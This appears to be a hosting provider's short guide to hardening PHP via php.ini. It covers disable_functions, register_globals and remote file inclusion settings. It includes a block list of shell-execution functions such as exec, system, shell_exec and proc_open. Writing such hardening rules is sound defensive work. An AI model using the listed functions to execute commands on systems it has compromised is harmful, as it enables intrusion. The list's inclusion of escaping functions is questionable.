Disabling Functionality in PHP.ini

There are certain functions in PHP that we don’t want users to use because of the danger they can pose. Even if you know your users aren’t utilizing certain functions it is wise to completely disable them so an attacker can’t use them. This security precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or even include a remote PHP file. By disabling the functionality, you ensure that you can limit the effectiveness of these types of attacks. Of course, there are always users who will complain, but we say will recommend to the to use Virtual Private servers and run whatever scripts they want.

disable_functions = exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen

Disable Globals

This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0. So this wont cause problems these days.

register_globals = Off

Disable Remote File Includes

Attackers will often attempt to identify file inclusion vulnerabilities in applications, then use them to include malicious PHP scripts that they have written. Even if an attacker doesn’t have write access to the web application directories, if a remote file inclusion is enabled the attacker can host malicious PHP scripts on another server while the web application fetches them and execute them locally!

We don’t block url_fopen in our hosting environment, because that can cause a lot of problems with the websites!

allow_url_fopen = On
allow_url_include = Off